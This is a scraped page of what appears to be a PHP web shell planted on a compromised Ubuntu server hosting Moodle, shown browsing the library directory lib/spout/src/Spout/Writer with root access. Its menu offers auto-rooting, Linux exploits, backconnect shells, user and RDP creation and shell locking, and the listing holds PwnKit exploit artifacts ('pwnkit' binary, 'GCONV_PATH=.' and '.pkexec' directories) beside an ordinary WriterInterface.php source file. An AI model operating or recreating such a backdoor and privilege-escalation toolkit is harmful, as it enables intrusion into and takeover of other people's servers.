Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
spout /
src /
Spout /
Writer /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
CSV
[ DIR ]
drwxrwxrwx
Common
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ODS
[ DIR ]
drwxrwxrwx
XLSX
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
WriterAbstract.php
7.41
KB
-rwxrwxrwx
WriterInterface.php
2.48
KB
-rwxrwxrwx
WriterMultiSheetsAbstract.php
5.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WriterInterface.php
<?php namespace Box\Spout\Writer; use Box\Spout\Common\Entity\Row; use Box\Spout\Common\Entity\Style\Style; /** * Interface WriterInterface */ interface WriterInterface { /** * Initializes the writer and opens it to accept data. * By using this method, the data will be written to a file. * * @param string $outputFilePath Path of the output file that will contain the data * @throws \Box\Spout\Common\Exception\IOException If the writer cannot be opened or if the given path is not writable * @return WriterInterface */ public function openToFile($outputFilePath); /** * Initializes the writer and opens it to accept data. * By using this method, the data will be outputted directly to the browser. * * @param string $outputFileName Name of the output file that will contain the data. If a path is passed in, only the file name will be kept * @throws \Box\Spout\Common\Exception\IOException If the writer cannot be opened * @return WriterInterface */ public function openToBrowser($outputFileName); /** * Sets the default styles for all rows added with "addRow". * Overriding the default style instead of using "addRowWithStyle" improves performance by 20%. * @see https://github.com/box/spout/issues/272 * * @param Style $defaultStyle * @return WriterInterface */ public function setDefaultRowStyle(Style $defaultStyle); /** * Appends a row to the end of the stream. * * @param Row $row The row to be appended to the stream * @throws \Box\Spout\Writer\Exception\WriterNotOpenedException If the writer has not been opened yet * @throws \Box\Spout\Common\Exception\IOException If unable to write data * @return WriterInterface */ public function addRow(Row $row); /** * Appends the rows to the end of the stream. * * @param Row[] $rows The rows to be appended to the stream * @throws \Box\Spout\Common\Exception\InvalidArgumentException If the input param is not valid * @throws \Box\Spout\Writer\Exception\WriterNotOpenedException If the writer has not been opened yet * @throws \Box\Spout\Common\Exception\IOException If unable to write data * @return WriterInterface */ public function addRows(array $rows); /** * Closes the writer. This will close the streamer as well, preventing new data * to be written to the file. * * @return void */ public function close(); }
Close